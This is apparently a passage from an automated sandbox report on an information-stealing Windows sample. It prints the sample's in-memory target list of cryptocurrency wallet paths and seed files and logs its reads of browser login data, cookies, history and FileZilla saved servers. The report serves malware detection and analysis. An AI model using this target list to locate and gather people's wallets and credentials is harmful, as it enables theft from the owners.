Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: \jaxx\Local Storage\
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: campuspersever.ess\AppData\Roaming\Binance\simple-storage.jsonz
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: file__0.localstorage
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2588602641.000000000066E000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Bitcoin Core|1|\Bitcoin\wallets\|wallet.dat|1|Bitcoin Core Old|1|\Bitcoin\|*wallet*.dat|0|Dogecoin|1|\Dogecoin\|*wallet*.dat|0|Raven Core|1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus\exodus.wallet|1|\Exodus\exodus.wallet\|info.seco|0|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Jaxx Desktop (old)|1|\jaxx\Local Storage\|file__0.localstorage|0|Jaxx Desktop|1|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\|*.*|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|1|\Coinomi\Coinomi\wallets\|*.wallet|1|Coinomi|1|\Coinomi\Coinomi\wallets\|*.config|1|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Chia Wallet\config|2|\.chia\mainnet\config\|*.*|0|Chia Wallet\run|2|\.chia\mainnet\run\|*.*|0|Chia Wallet\wallet|2|\.chia\mainnet\wallet\|*.*|0|Komodo Wallet\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                      Source: hwWxZRwpeL.exe, 00000000.00000002.2589210016.00000000007ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\*.*'
                      Tries to harvest and steal Bitcoin Wallet information
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\monero-project\monero-coreJump to behavior
                      Tries to harvest and steal browser information (history, passwords, etc)
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-walJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-shmJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite-shmJump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite-walJump to behavior
                      Tries to harvest and steal ftp login credentials
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                      Tries to steal Crypto Currency Wallets
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                      Source: C:\Users\user\Desktop\hwWxZRwpeL.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
